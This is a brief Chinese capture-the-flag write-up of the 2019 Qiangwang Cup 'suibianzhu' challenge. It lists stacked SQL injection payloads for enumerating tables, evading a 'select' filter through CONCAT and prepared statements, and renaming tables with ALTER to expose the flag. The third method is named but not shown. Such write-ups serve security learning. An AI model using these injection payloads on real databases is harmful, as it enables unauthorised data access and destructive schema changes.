[强网杯 2019]随便注(三种方法)
[强网杯 2019]随便注(三种方法)
-
1';show database; #
-
1';show tables;#
-
1';show columns from
1919810931114514; # (数据表名为数字,则需要用反引号)
第一种方法 :
储存过程绕过(利用prepare语句):
1';
set @a = CONCAT('se','lect * from `1919810931114514`;'); //字符串拼接绕过select过滤
prepare flag from @a;
EXECUTE flag;#
第二种方法:
重命名绕过(利用alter语句与rename语句):
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(50);#
第三种方法:
handler语句代替select查询:
浙公网安备 33010602011771号